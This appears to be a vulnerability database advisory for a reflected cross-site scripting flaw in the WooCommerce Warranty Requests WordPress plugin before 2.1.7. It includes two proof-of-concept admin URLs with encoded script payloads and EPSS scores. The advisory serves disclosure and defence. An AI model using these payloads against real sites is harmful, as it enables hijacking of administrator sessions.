WooCommerce Warranty Requests < 2.1.7 - Reflected XSS

2023-05-2200:00:00

wpvulndb

woocommerce

warranty requests

reflected xss

logged in admin

security exploit

vulnerability

admin access

url manipulation

EPSS

0.001

Percentile

27.9%

JSON

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open the URL below

v <= 2.1.6
https://example.com/wp-admin/admin.php?page=warranties&view=updater&act=migrate_products&params[%78%78%20%3d%20%31%3b%20%61%6c%65%72%74%28%31%29%3b%20%2f%2f]=x

v < 2.1.6
https://example.com/wp-admin/admin.php?page=warranties&view=updater&act=migrate_products&params%5Bx%5D=xxxx%27qqqqq%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

References

patchstack.com/database/vulnerability/woocommerce-warranty/wordpress-woocommerce-warranty-requests-plugin-2-1-6-reflected-cross-site-scripting-xss-vulnerability

EPSS

0.001

Percentile

27.9%

JSON

Related for WPEX-ID:64CF1CFD-CED1-4F5F-8EB8-280556B8AD8D